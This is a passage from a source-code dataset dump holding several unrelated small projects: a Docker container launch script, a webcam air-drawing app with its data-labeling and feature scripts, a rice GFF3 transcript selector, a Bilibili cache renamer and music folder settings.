"blob_id": "35d8ec65ac34ac1a44fe374d3490dbc5872d5970",
"content_id": "799178748bd6de85d45f28d23766f94b0d2b188d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1546,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 63,
"path": "/suse-splunk/docker-run.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n\nhelp () {\n echo \"Usage: $0 hostname type(optional)\"\n echo \"type = mysql apache splunk splunk-light splunk-fw squid samba torrent gitlab gcc\"\n}\n\nif [ $# -lt 1 ] ; then\n help && exit 1\nfi\n\n\nHOSTNAME=$1\nTYPE=$2\nLINKED_CONTAINER=$3\n\ncase $TYPE in\n mysql) IMAGE=\"suse-mysql\" ; PORTS=\"3306\" ;;\n apache)IMAGE=\"suse-apache\" ; PORTS=\"80 443\";;\n squid) IMAGE=\"suse-squid\" ; PORTS=\"3128\" ;;\n samba) IMAGE=\"suse-samba\" ; PORTS=\"\" ;;\n torrent) IMAGE=\"suse-torrent\";;\n gitlab) IMAGE=\"suse-gitlab\";;\n gcc) IMAGE=\"suse-gcc\";;\n splunk) IMAGE=\"suse-splunk\"; PORTS=\"8000 443 9997\";;\n splunk-light) IMAGE=\"suse-splunk-light\"; PORTS=\"8000 443\";;\n splunk-fw) IMAGE=\"suse-splunk-fw\"; PORTS=\"8089\";;\n *) help && exit 1 ;;\nesac\n\nVIP=`getent hosts $HOSTNAME | awk '{print $1}'`\nENV_DIRECTORY=\"/data/docker/$TYPE/$HOSTNAME\"\nDATA_VOLUMES=\"\"\n\nif [ ! -z \"$LINKED_CONTAINER\" ] ; then\n EXTRA_OPTS=\"$EXTRA_OPTS --link $LINKED_CONTAINER \"\nfi\n\nif [ ! -z \"$PORTS\" ] ; then\n\tfor PORT in $PORTS ; do\n \tEXTRA_OPTS=\"$EXTRA_OPTS -p $VIP:$PORT:$PORT \"\n\tdone\nfi\n\nif [ ! -z \"$DATA_VOLUMES\" ] ; then\n\tfor i in $DATA_VOLUMES ; do\n\t\tif [ ! -d $ENV_DIRECTORY/$i ] ; then\n\t\t\tmkdir -p $ENV_DIRECTORY/$i\n\t\tfi\n\n\t\tif [ \"$(ls -A $ENV_DIRECTORY/$i)\" != \"\" ] ; then\n\t\t\tVOLUMES=\"$VOLUMES -v $ENV_DIRECTORY/$i:/$i \"\n\t\tfi\n\tdone\nfi\n\ndocker run -d --name $HOSTNAME \\\n-h $HOSTNAME \\\n$VOLUMES \\\n$EXTRA_OPTS \\\n-e SPLUNK_START_ARGS=\"--accept-license --answer-yes --no-prompt\" \\\n$IMAGE\n"
}
] | 51 |
Juan-glitch/air-drawing
|
https://github.com/Juan-glitch/air-drawing
|
bddd9e1d0738334fed4eb2dd83ffe8d01a8f3ed3
|
55e818b595d71b459dba69e43b792cedc7a8b5e8
|
13b70cb120d8816c541a6ed8815313195d381a73
|
refs/heads/main
| 2023-07-31T11:29:02.240528 | 2021-09-12T20:31:09 | 2021-09-12T20:31:09 | 407,596,771 | 1 | 0 |
MIT
| 2021-09-17T15:46:40 | 2021-09-17T15:46:39 | 2021-09-12T20:31:09 | null |
[
{
"alpha_fraction": 0.7815168499946594,
"alphanum_fraction": 0.7830235958099365,
"avg_line_length": 98.55000305175781,
"blob_id": "f2478707b2c2d378db0c86e4e4d7c3392fac14d8",
"content_id": "97a121782e8a90639805f5fc052bdb10b7f6e031",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1994,
"license_type": "permissive",
"max_line_length": 848,
"num_lines": 20,
"path": "/README.md",
"repo_name": "Juan-glitch/air-drawing",
"src_encoding": "UTF-8",
"text": "# air-drawing 👆\n\nThis tool uses Deep Learning to help you draw and write with your hand and webcam. A Deep Learning model is used to try to predict whether you want to have 'pencil up' or 'pencil down'.\n\n**Try it online : [loicmagne.github.io/air-drawing](https://loicmagne.github.io/air-drawing/)**\n\n\n\n## Technical Details\n\n- This pipeline is made up of two steps: detecting the hand, and predicting the drawing. Both steps are done using Deep Learning.\n- The handpose detection is performed using [MediaPipe toolbox](https://google.github.io/mediapipe/solutions/hands.html)\n- The drawing prediction part uses only the finger position, not the image. The input is a sequence of 2D points (actually i'm using the speed and acceleration of the finger instead of the position to make the prediction translation-invariant), and the output is a binary classification 'pencil up' or 'pencil down'. I used a simple bidirectionnal LSTM architecture. I made a small dataset myself (~50 samples) which I annotated thanks to tools provided in the `python-stuff/data-wrangling/`. At first I wanted to make the 'pencil up'/'pencil down' prediction in real-time, i.e. make the predictions at the same time the user draws. However this task was too difficult and I had poor results, which is why I'm now using bidirectionnal LSTM. You can find details of the deep learning pipeline in the jupyter-notebook in `python-stuff/deep-learning/`\n- The application is entirely client-side. I deployed the deep learning model by converting the PyTorch model to .onnx, and then using the [ONNX Runtime](https://github.com/microsoft/onnxruntime) which is very convenient and compatible with a lot of layers.\n\n## Going Forward\n\nOverall the pipeline still struggles and needs some improvement. Ideas of amelioration include :\n- Having a bigger dataset, with more diverse user data.\n- Process and smooth the finger signal, to be less dependent on camera quality, and to improve model generalization.\n"
},
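The README above describes the prediction model only in prose. Below is a minimal sketch of that idea, not the author's exact code: derive translation-invariant speed and acceleration features from the 2D fingertip points, then classify each timestep with a bidirectional LSTM. The feature layout and layer sizes are assumptions.

import numpy as np
import torch
import torch.nn as nn

def point_features(xy):
    """xy: (T, 2) fingertip positions -> (T, 4) array of [vx, vy, ax, ay]."""
    v = np.diff(xy, axis=0, prepend=xy[:1])   # speed: first differences
    a = np.diff(v, axis=0, prepend=v[:1])     # acceleration: second differences
    return np.concatenate([v, a], axis=1).astype(np.float32)

class PenStateLSTM(nn.Module):
    """Per-timestep 'pencil down' logit from a bidirectional LSTM."""
    def __init__(self, in_dim=4, hidden=32):
        super().__init__()
        self.lstm = nn.LSTM(in_dim, hidden, batch_first=True, bidirectional=True)
        self.head = nn.Linear(2 * hidden, 1)  # both directions concatenated

    def forward(self, x):                     # x: (batch, T, in_dim)
        out, _ = self.lstm(x)
        return self.head(out).squeeze(-1)     # (batch, T) logits

points = np.random.rand(50, 2)                # stand-in for a recorded stroke
feats = torch.from_numpy(point_features(points)).unsqueeze(0)
probs = torch.sigmoid(PenStateLSTM()(feats))  # P('pencil down') per point

Differencing the coordinates rather than using them directly is what makes the prediction translation-invariant, as the README notes; a model of this shape can then be exported to .onnx with torch.onnx.export and served by ONNX Runtime in the browser.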
{
"alpha_fraction": 0.5952693819999695,
"alphanum_fraction": 0.6675426959991455,
"avg_line_length": 22.090909957885742,
"blob_id": "26fc7da720153f58f5b4608bda3a2148e24c38a9",
"content_id": "03c84f2b3aed0cc2d99bffe2ac33b052ab9b0427",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 761,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 33,
"path": "/python-stuff/data-wrangling/labels-maker.py",
"repo_name": "Juan-glitch/air-drawing",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np\nimport cv2\n\n\ndata_file = 'thinking.csv'\n\n\"\"\"\nlabels must be a list of segments where the time serie class is true \n(i.e. the list of segments where the drawer has \"hands down\")\n\"\"\"\n\nlabels = [(29,96),(122,145),(162,185),(209,220),(244,261),(339,454)]\n\ndf = pd.read_csv('data/unlabeled_csv/'+data_file,index_col=0)\ndf[\"label\"] = False\n\nfor interval in labels:\n start,end = interval\n df.loc[start:end,\"label\"] = True\n\ndf.to_csv('data/raw_labeled/'+data_file)\n\ngood_points = df.loc[df['label'] == True][['x','y']]\npts = good_points.to_numpy().astype(int)\n\nimg = np.zeros((720,1280), dtype=np.uint8)\nimg[pts.T[1],pts.T[0]]=255\nimg = cv2.flip(img, 1)\n\ncv2.imshow('frame', img)\nkey = cv2.waitKey(0)\ncv2.destroyAllWindows()"
},
{
"alpha_fraction": 0.5372492671012878,
"alphanum_fraction": 0.5787965655326843,
"avg_line_length": 20.18181800842285,
"blob_id": "9dd467f97ef2fc4e6a3f2469c0c4683b79bd191e",
"content_id": "497ee6feede376d6500976108388a615d0ba9fb0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 698,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 33,
"path": "/python-stuff/data-wrangling/data-visualizer.py",
"repo_name": "Juan-glitch/air-drawing",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np\nimport cv2\n\n\ndf = pd.read_csv('data/unlabeled_csv/thinking.csv',index_col=0)\npts = df.to_numpy().astype(int)\n\nblack_img = np.zeros((720,1280), dtype=np.uint8)\n\nn = len(pts)\ncounter = 0\n\nwhile True:\n img = np.copy(black_img)\n img[pts[:counter].T[1],pts[:counter].T[0]]=255\n img = cv2.flip(img, 1)\n\n cv2.imshow('frame', img)\n key = cv2.waitKey(1)\n if key == ord('q'):\n break\n if key == ord('b'):\n counter = max(counter-1,0)\n print(counter-1)\n if key == ord('n'):\n counter = min(counter+1,n)\n print(counter-1)\n if key == ord('z'):\n counter = 0\n print(counter-1)\n\ncv2.destroyAllWindows()"
},
{
"alpha_fraction": 0.46206897497177124,
"alphanum_fraction": 0.47678160667419434,
"avg_line_length": 30.08571434020996,
"blob_id": "4cb958c8a2019420e1779fea3aa4b41956c73dc3",
"content_id": "1b60e8b841062a57dbabf5c7e6c5c196f26c5932",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2175,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 70,
"path": "/python-stuff/data-wrangling/add-features.py",
"repo_name": "Juan-glitch/air-drawing",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np\nfrom os import listdir\nfrom tqdm import tqdm\n\nraw_folder = \"data/raw_labeled/\"\noutput_folder = \"data/processed_labeled/\"\n\n# We intentionnaly drop some points to have a smoother drawing\n# interval define the step between each kept points\n\nfor interval in [1,2,3,4]:\n for f in tqdm(listdir(raw_folder)):\n df_raw = pd.read_csv(raw_folder+f,index_col=0)\n df = df_raw.iloc[::interval].copy().reset_index(drop=True)\n\n df[\"vx\"] = 0.\n df[\"vy\"] = 0.\n df[\"v\"] = 0.\n df[\"ax\"] = 0.\n df[\"ay\"] = 0.\n df[\"a\"] = 0.\n df[\"dist_left\"] = 0.\n df[\"dist_right\"] = 0.\n df[\"dist\"] = 0.\n n = df.shape[0]\n \n # add speed\n for k in range(1,n):\n vx = df.loc[k,'x'] - df.loc[k-1,'x']\n vy = df.loc[k,'y'] - df.loc[k-1,'y']\n v = np.sqrt(vx*vx + vy*vy)\n df.loc[k,'vx'] = vx\n df.loc[k,'vy'] = vy\n df.loc[k,'v'] = v\n\n # add acceleration\n for k in range(1,n):\n ax = df.loc[k,'vx'] - df.loc[k-1,'vx']\n ay = df.loc[k,'vy'] - df.loc[k-1,'vy']\n a = np.sqrt(ax*ax + ay*ay)\n df.loc[k,'ax'] = ax\n df.loc[k,'ay'] = ay\n df.loc[k,'a'] = a\n\n # distance to swap starting from the right side\n dist_right = 0.\n for k in range(1,n):\n dist_right += 1.\n current = n-k-1\n previous = n-k\n if df.loc[current,'label'] != df.loc[previous,'label']:\n dist_right = 0.\n df.loc[current,'dist_right'] = dist_right\n\n # distance to swap starting from the left side\n dist_left = 0.\n for k in range(1,n):\n dist_left += 1.\n current = k\n previous = k-1\n if df.loc[current,'label'] != df.loc[previous,'label']:\n dist_left = 0.\n df.loc[current,'dist_left'] = dist_left\n \n # min distance to a swap\n for k in range(1,n):\n df.loc[k,'dist'] = min(df.loc[k,'dist_left'],df.loc[k,'dist_right'])\n\n df.to_csv(f'{output_folder}{interval}_{f}')"
},
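The per-row loops above can be expressed with vectorized pandas operations. Below is a sketch of equivalent speed and acceleration columns under the same x/y schema (the dist_left/dist_right columns would still need a scan over label changes); it is an alternative formulation for illustration, not the author's code.

import numpy as np
import pandas as pd

def add_motion_features(df):
    # First differences give speed, second differences give acceleration;
    # fillna(0.0) reproduces the script's zero values on the first row.
    out = df.copy()
    out["vx"] = out["x"].diff().fillna(0.0)
    out["vy"] = out["y"].diff().fillna(0.0)
    out["v"] = np.hypot(out["vx"], out["vy"])
    out["ax"] = out["vx"].diff().fillna(0.0)
    out["ay"] = out["vy"].diff().fillna(0.0)
    out["a"] = np.hypot(out["ax"], out["ay"])
    return out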
{
"alpha_fraction": 0.5463151931762695,
"alphanum_fraction": 0.571746826171875,
"avg_line_length": 28.767955780029297,
"blob_id": "173bbc931928db3f848303824ff03da6d263e629",
"content_id": "350c128de6100452a05e365c89ffa0029dc1874c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 5387,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 181,
"path": "/js/scriptent.js",
"repo_name": "Juan-glitch/air-drawing",
"src_encoding": "UTF-8",
"text": "const fingers = {\n index1: 8,\n index2: 7,\n index3: 6,\n index4: 5,\n middle1: 12,\n middle2: 11,\n middle3: 10,\n middle4: 9,\n ring1: 16,\n ring2: 15,\n ring3: 14,\n ring4: 13,\n little1: 20,\n little2: 19,\n little3: 18,\n little4: 17,\n thumb1: 4,\n thumb2: 3,\n thumb3: 2,\n thumb4: 1,\n thumb5: 0\n}\n\nconst finger_state = {\n landmarks: undefined,\n index: false,\n middle: false,\n ring: false,\n little: false\n}\n\nfunction gesture() {\n /*\n 0 : nothing\n 1 : index up, drawing state\n 2 : index and middle up, eraser state\n */\n if (finger_state.index && !finger_state.middle && !finger_state.ring && !finger_state.little) {return 1;}\n if (finger_state.index && finger_state.middle && !finger_state.ring && !finger_state.little) {return 2;}\n return 0;\n}\n\nfunction download_points(stroke_list) {\n const a = document.createElement(\"a\");\n const file = stroke_list.download();\n a.href = URL.createObjectURL(file);\n a.download = \"data.txt\";\n a.click();\n}\n\nclass Point {\n constructor(x,y) {\n this.x = x;\n this.y = y;\n }\n\n static distance(a,b) {\n return Math.hypot(a.x-b.x,a.y-b.y);\n }\n}\n\nfunction init() {\n const download_button = document.querySelector('#download_button')\n const clear_button = document.querySelector('#clear_button')\n const dl_button = document.querySelector('#dl_button')\n const video = document.querySelector('video');\n const canvas = document.querySelector('canvas');\n const context = canvas.getContext('2d');\n\n const width = canvas.width;\n const height = canvas.height;\n\n const erase_radius = 40.;\n\n const draw_icon = new Image();\n const erase_icon = new Image();\n draw_icon.src = 'assets/draw.png';\n erase_icon.src = 'assets/erase.png';\n\n let stroke_list = new StrokeList();\n let previous_pt = null;\n download_button.onclick = () => download_points(stroke_list);\n clear_button.onclick = () => stroke_list.clear();\n dl_button.onclick = () => stroke_list.predict();\n\n async function process() {\n context.save();\n\n // draw video stream\n context.clearRect(0, 0, canvas.width, canvas.height);\n context.drawImage(video, 0, 0, canvas.width, canvas.height);\n\n // draw hands\n await hands.send({image: video});\n\n let gest = gesture();\n\n // draw icons\n \n if (gest == 1) {\n // the user is drawing\n context.globalAlpha = 1;\n context.drawImage(draw_icon,width-166,height-100);\n // register point\n index_pos = finger_state.landmarks[fingers.index1];\n new_pt = new Point(index_pos.x*width,index_pos.y*height);\n stroke_list.add_pt(new_pt);\n previous_pt = new_pt;\n } else {\n if (previous_pt !== null) {\n stroke_list.new_stroke();\n previous_pt = null;\n }\n context.globalAlpha = 0.2;\n context.drawImage(draw_icon,width-166,height-100);\n }\n\n if (gest == 2) {\n // the user is erasing\n context.globalAlpha = 1;\n context.drawImage(erase_icon,width-166,height-200);\n // register erase\n idx = finger_state.landmarks[fingers.index1];\n mdl = finger_state.landmarks[fingers.middle1];\n erase_pos = new Point(width*(idx.x+mdl.x)/2.,height*(idx.y+mdl.y)/2.);\n // filter erased points\n stroke_list.erase(erase_pos,erase_radius);\n // draw eraser\n context.lineWidth = 5;\n context.strokeStyle = 'salmon';\n context.beginPath();\n context.arc(erase_pos.x, erase_pos.y, erase_radius, 0, 2*Math.PI);\n context.stroke()\n } else {\n context.globalAlpha = 0.2;\n context.drawImage(erase_icon,width-166,height-200);\n }\n context.restore();\n\n context.save();\n stroke_list.draw(context);\n context.restore();\n }\n\n function processHands(results) {\n if 
(results.multiHandLandmarks) {\n for (const landmarks of results.multiHandLandmarks) {\n drawConnectors(context, landmarks, HAND_CONNECTIONS,{color: '#00FF00', lineWidth: 5});\n drawLandmarks(context, landmarks, {color: '#FF0000', lineWidth: 2});\n\n // update fingers state\n finger_state.landmarks = landmarks;\n finger_state.index = landmarks[fingers.index1].y < landmarks[fingers.index3].y;\n finger_state.middle = landmarks[fingers.middle1].y < landmarks[fingers.middle3].y;\n finger_state.ring = landmarks[fingers.ring1].y < landmarks[fingers.ring3].y;\n finger_state.little = landmarks[fingers.little1].y < landmarks[fingers.little3].y;\n }\n }\n }\n\n const hands = new Hands({locateFile: (file) => {\n return `https://cdn.jsdelivr.net/npm/@mediapipe/hands/${file}`;\n }});\n hands.setOptions({\n selfieMode: false,\n maxNumHands: 1,\n minDetectionConfidence: 0.5,\n minTrackingConfidence: 0.5\n });\n hands.onResults(processHands);\n\n const camera = new Camera(video, {\n onFrame: process,\n width: 1920,\n height: 1080\n });\n camera.start();\n}\n\nwindow.onload = init"
},
{
"alpha_fraction": 0.6308186054229736,
"alphanum_fraction": 0.6966292262077332,
"avg_line_length": 21.285715103149414,
"blob_id": "b0229d51f2f789d267936b766801ecb755b5dacc",
"content_id": "09e43e97a27fd7242ed76262eb190e4717571ee9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 623,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 28,
"path": "/python-stuff/data-wrangling/visualize-rdp.py",
"repo_name": "Juan-glitch/air-drawing",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np\nimport cv2\nfrom rdp import rdp\nfrom os import listdir\n\n\ndf = pd.read_csv('data/raw_labeled/euler_sum.csv',index_col=0)\npoints = df[['x','y']].to_numpy().astype(int)\npoints_rdp = rdp(points,1.)\nprint(len(points))\nprint(len(points_rdp))\n\nimg = np.zeros((720,1280), dtype=np.uint8)\nimg[points.T[1],points.T[0]]=255\nimg = cv2.flip(img, 1)\n\ncv2.imshow('frame', img)\nkey = cv2.waitKey(0)\ncv2.destroyAllWindows()\n\nimg = np.zeros((720,1280), dtype=np.uint8)\nimg[points_rdp.T[1],points_rdp.T[0]]=255\nimg = cv2.flip(img, 1)\n\ncv2.imshow('frame', img)\nkey = cv2.waitKey(0)\ncv2.destroyAllWindows()"
},
{
"alpha_fraction": 0.5416666865348816,
"alphanum_fraction": 0.5439814925193787,
"avg_line_length": 24.47058868408203,
"blob_id": "8e3726bbba263b60bca9b5f3cf4190eaba971567",
"content_id": "90137d6cb766242a32417927c49a4b7c37a1b67a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 432,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 17,
"path": "/python-stuff/data-wrangling/json-to-csv.py",
"repo_name": "Juan-glitch/air-drawing",
"src_encoding": "UTF-8",
"text": "import json\nimport pandas as pd\nfrom os import listdir\n\ntxt_folder = \"data/unlabeled_txt/\"\ncsv_folder = \"data/unlabeled_csv/\"\n\nfor file in listdir(txt_folder):\n with open(txt_folder+file) as f:\n data = json.load(f)\n x = []\n y = []\n for pt in data:\n x.append(pt['x'])\n y.append(pt['y'])\n df = pd.DataFrame(data={'x': x,'y': y})\n df.to_csv(csv_folder+file[:-3]+'csv')"
},
{
"alpha_fraction": 0.6310432553291321,
"alphanum_fraction": 0.6844783425331116,
"avg_line_length": 22.176469802856445,
"blob_id": "d42f23684a8afbc0181e4aafee62f46c3e1adf89",
"content_id": "ae503c5a49bb345ecf56c805a3d0aa5a58bce5ce",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 393,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 17,
"path": "/python-stuff/data-wrangling/label-visualizer.py",
"repo_name": "Juan-glitch/air-drawing",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np\nimport cv2\nfrom os import listdir\n\n\ndf = pd.read_csv('data/raw_labeled/reveil.csv',index_col=0)\ngood_points = df.loc[df['label'] == True][['x','y']]\npts = good_points.to_numpy().astype(int)\n\nimg = np.zeros((720,1280), dtype=np.uint8)\nimg[pts.T[1],pts.T[0]]=255\nimg = cv2.flip(img, 1)\n\ncv2.imshow('frame', img)\nkey = cv2.waitKey(0)\ncv2.destroyAllWindows()"
}
] | 8 |
mayupsc/some_python_codes
|
https://github.com/mayupsc/some_python_codes
|
1b2fccb47c73d836b779e5f168e7c358b234889f
|
aac8687f69ca269a0104880e0240f03142d368c4
|
d7df3f4922347f04035dfa54c5fbed88707e5139
|
refs/heads/master
| 2020-04-08T23:33:04.026765 | 2018-11-30T13:46:26 | 2018-11-30T13:46:26 | 159,829,390 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5740498304367065,
"alphanum_fraction": 0.5969855785369873,
"avg_line_length": 35.219512939453125,
"blob_id": "2d26521a9f408eda0f50fcc2aacb0a0e53f6d0e6",
"content_id": "f7c67f14f413d7cd609b89138fac8c9551f679d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1526,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 41,
"path": "/select.py",
"repo_name": "mayupsc/some_python_codes",
"src_encoding": "UTF-8",
"text": "#1/usr/bin/env python3\r\nimport re\r\nimport fileinput\r\nfrom collections import defaultdict\r\n\r\ngene_dict = defaultdict(list)\r\ntx_dict = defaultdict(list)\r\ntx_pos_dict = defaultdict(list)\r\nf=open(\"/home/galaxy/Desktop/Oryza_sativa.IRGSP-1.0.41.gff3\")\r\nf.new=open(\"/home/galaxy/Desktop/Oryza_sativa.IRGSP-1.0.41.gff3.new\",\"w\")\r\nfor line in f:\r\n if line.startswith(\"#\"):\r\n continue\r\n content = line.split(\"\\t\")\r\n if content[2] == 'gene':\r\n gene_id = re.search(r'ID=(.*?)[;\\n]',content[8]).group(1)\r\n gene_dict[gene_id] = []\r\n if content[2] == 'transcript' or content[2] == 'mRNA':\r\n tx_id = re.search(r'ID=(.*?)[;\\n]',content[8]).group(1)\r\n tx_parent = re.search(r'Parent=(.*?)[;\\n]',content[8]).group(1)\r\n gene_dict[tx_parent].append(tx_id)\r\n tx_pos_dict[tx_id] = [content[0],content[3], content[4], content[6]]\r\n if content[2] == 'CDS':\r\n width = int (content[4]) - int(content[3])\r\n cds_parent = re.search(r'Parent=(.*?)[;\\n]',content[8]).group(1)\r\n tx_dict[cds_parent].append(width)\r\n\r\nfor gene, txs in gene_dict.items():\r\n tmp = 0\r\n for tx in txs:\r\n tx_len = sum(tx_dict[tx])\r\n if tx_len > tmp:\r\n lst_tx = tx\r\n tmp = tx_len\r\n tx_chrom = tx_pos_dict[lst_tx][0]\r\n tx_start = tx_pos_dict[lst_tx][1]\r\n tx_end = tx_pos_dict[lst_tx][2]\r\n tx_strand = tx_pos_dict[lst_tx][3]\r\n f.new.write(\"{gene}\\t{tx}\\t{chrom}\\t{start}\\t{end}\\t{strand}\\n\".format(gene=gene,tx=lst_tx,chrom=tx_chrom,start=tx_start,end=tx_end,strand=tx_strand))\r\n\r\nf.new.close()\r\n"
}
] | 1 |
cjngh/biliRename
|
https://github.com/cjngh/biliRename
|
f6773385bb90f7ac2c76ffcc15212fb94d32f8a3
|
a7326bc2468aaba76fd241a34dfdb617a690363e
|
7627cdd6adbedaf7bcb17fb8d2cc01318e7b2455
|
refs/heads/master
| 2020-05-25T09:49:00.276878 | 2019-05-21T03:24:17 | 2019-05-21T03:24:17 | 187,746,530 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.601636528968811,
"alphanum_fraction": 0.6128337383270264,
"avg_line_length": 37.71666717529297,
"blob_id": "c4a9a58ede8d472ad1f191696f10a0642a400518",
"content_id": "9d8bc3d390d7d262b0e337c8bb0e7e2afaeca2b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2756,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 60,
"path": "/biliRename.py",
"repo_name": "cjngh/biliRename",
"src_encoding": "UTF-8",
"text": "import os\nimport json\nimport shutil\nimport winreg\n\n# author:skybay\n# date:2019/04/22\n# 公众号:skybay\n\ndef getDesktop():\n key=winreg.OpenKey(winreg.HKEY_CURRENT_USER,r'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders')\n return winreg.QueryValueEx(key,'Desktop')[0]\n\ndef getSubDirNames(file_dir):\n for root,dirs,files in os.walk(file_dir):\n return dirs\n\n\ndef getSubFileNames(file_dir):\n for root,dirs,files in os.walk(file_dir):\n return files\n\n\nif __name__==\"__main__\":\n print(\"请确保B站缓存数字文件夹保存在桌面“B站缓存”文件夹中!\")\n input(\"若确定视频已保存在桌面“B站缓存”文件夹中,则回车开始重命名!\")\n desktop=getDesktop()\n srcFile=desktop+r\"\\B站缓存\"\n dirList=getSubDirNames(srcFile) # 获取数字子文件夹列表(只包含子文件夹)\n for path in dirList:\n dirPath=os.path.join(srcFile,path) # 拼接视频集合数字子文件夹路径\n dirList2 = getSubDirNames(dirPath) # 获取单集数字子文件夹列表(只包含子文件夹)\n setTitle=\"\" # 集合名\n setTitlePath=\"\" # 集合路径\n for path1 in dirList2:\n dirPath1=os.path.join(dirPath,path1) # 拼接单集数字子文件夹路径\n fileNames=getSubFileNames(dirPath1) # 获取单集数字子文件夹中的文件列表\n for infoFileNames in fileNames: # 获取并暂存标题\n infoFilePath=os.path.join(dirPath1,infoFileNames) # 拼接单集数字子文件夹中文件的路径\n if infoFilePath.endswith(\"json\"):\n openFile=open(infoFilePath,encoding=\"UTF-8\")\n info=openFile.read()\n if not setTitle.strip():\n setTitle=json.loads(info)[\"title\"] # 集合名\n setTitlePath=os.path.join(srcFile,setTitle)\n os.makedirs(setTitlePath)\n title=json.loads(info)[\"page_data\"][\"part\"] # 单集名\n openFile.close()\n dir3Name=getSubDirNames(dirPath1) # 获取第四层文件夹名\n dirPath2=os.path.join(dirPath1,dir3Name[0]) # 拼接视频所在文件夹路径\n files = getSubFileNames(dirPath2) # 获取视频文件夹中的文件列表\n for VFile in files:\n if VFile.endswith(\"blv\"):\n oldVFileName=dirPath2+\"\\\\\"+VFile\n newVFileName=os.path.join(dirPath2,title)+'.blv'\n os.rename(oldVFileName,newVFileName) # 改名\n shutil.move(newVFileName,setTitlePath) # 移动\n for path in dirList:\n dirPath = os.path.join(srcFile, path)\n shutil.rmtree(dirPath)"
}
] | 1 |
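A small sketch of the metadata lookup the script above performs; the JSON snippet is a made-up stand-in for a Bilibili cache `entry.json`, showing only the two fields biliRename.py actually reads:

```python
import json

# Hypothetical cache metadata, mirroring the fields used for renaming.
info = '{"title": "Some Series", "page_data": {"part": "Episode 01"}}'
data = json.loads(info)
print(data["title"])              # collection title -> destination folder name
print(data["page_data"]["part"])  # episode title -> new .blv file name
```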
Velinsky/Music-Library-Builder
|
https://github.com/Velinsky/Music-Library-Builder
|
458159f2bb95150f6cc1c98e8b3d27a493c8a14c
|
80655de6b1dfdc74f30f1e89d4b69067165a9ede
|
c69245e7096ae6fe42ab8730a69c3665c849d3cc
|
refs/heads/master
| 2020-12-25T18:18:52.400944 | 2011-07-08T19:26:17 | 2011-07-08T19:26:17 | 2,013,763 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7412587404251099,
"alphanum_fraction": 0.7412587404251099,
"avg_line_length": 35,
"blob_id": "a2ef7dba91a989e0e1e499e6e5fbdddb4d3988b0",
"content_id": "eb5144c4d1ebe7f5a3fcf2ce244e36b6291c842a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 143,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 4,
"path": "/config.py",
"repo_name": "Velinsky/Music-Library-Builder",
"src_encoding": "UTF-8",
"text": "# constants definitions\nMUSIC_INBOX_DIR = 'F:\\Music\\inbox'\nMUSIC_QUANTUM_DIR = 'C:\\Projects\\Music Quantum'\nMUSIC_OUTBOX_DIR = 'F:\\Music\\outbox'"
},
{
"alpha_fraction": 0.6388206481933594,
"alphanum_fraction": 0.6584766507148743,
"avg_line_length": 22.257143020629883,
"blob_id": "822f16c890a212273bec2ae0199d404279f672f5",
"content_id": "ad0968529d5f5e2b71f4ac4596d865201066b119",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 814,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 35,
"path": "/quantum-progress-reader.py",
"repo_name": "Velinsky/Music-Library-Builder",
"src_encoding": "UTF-8",
